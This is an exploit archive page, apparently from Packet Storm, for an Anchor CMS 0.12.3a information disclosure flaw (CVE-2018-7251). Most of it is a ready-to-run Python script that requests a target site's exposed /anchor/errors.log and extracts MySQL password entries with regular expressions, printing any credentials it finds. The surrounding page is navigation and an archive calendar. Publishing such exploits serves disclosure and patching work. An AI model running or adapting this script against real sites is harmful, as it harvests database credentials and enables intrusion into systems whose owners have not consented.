exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Anchor CMS 0.12.3a Information Disclosure

Anchor CMS 0.12.3a Information Disclosure
Posted Oct 3, 2019
Authored by Tijme Gommers

Anchor CMS version 0.12.3a information disclosure exploit.

tags | exploit, info disclosure
advisories | CVE-2018-7251
SHA-256 | 6fff9776ce793dce9f2cfa4eeca3df01e5583139f2c587e88cbe50807b42e8cc

Anchor CMS 0.12.3a Information Disclosure

Change Mirror Download
# Exploit Title: Information disclosure (MySQL password) in error log
# Date: 2/10/2019
# Exploit Author: Tijme Gommers (https://twitter.com/finnwea/)
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://github.com/anchorcms/anchor-cms/releases
# Version: 0.12.3a
# Tested on: Linux
# CVE : CVE-2018-7251

# By default, AnchorCMS will log errors to the "/anchor/errors.log" file in the webroot of the web application. This allows malicious users to access the error log and view potentally sensitive information. Sometimes the AnchorCMS error log contains ocurrences of the MySQL error "Can't connect to MySQL server on 'xxx.xxx.xxx.xxx' (111)". When this error occurs the variables of the MySQL connector class are serialized into a JSON object and logged to the error log.

import re
import sys
import importlib


def get_plain(url):
try:
plain_result = requests.get(url=url)
return plain_result
except:
return None


def print_usage():
print('Usage: {0} <url>'.format(__file__))


if __name__ == '__main__':

# Ensure we have the URL
if len(sys.argv) != 2:
print_usage()
sys.exit(1)

print("* Using AnchorCMS website: " + sys.argv[1])

print("* Trying to import 'requests' module")
requests_loader = importlib.util.find_spec('requests')
requests_module_found = requests_loader is not None

if requests_module_found:
import requests
else:
print("* 'requests' module not found, please install it using pip")
print("* pip install requests")
sys.exit(1)

json_url = sys.argv[1].strip("/") + "/anchor/errors.log"
print("* Trying to get errors.log file at: {}".format(json_url))
plain_result = get_plain(json_url)

if plain_result == None:
print("* URL could not be requested, errors.log is probably not exposed")
sys.exit(1)

print("* Found data {}, trying to parse it now".format(plain_result))

lines = re.findall(r'"line":\d', plain_result.text)

print("* Found {} error entries".format(len(lines)))

passwords = re.findall(r'\[([^\[\]]*)"password"([^\[\]]*)\]', plain_result.text)

print("* Found {} passwords entries".format(len(passwords)))

for password in passwords:
print("+ {}".format(password))
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close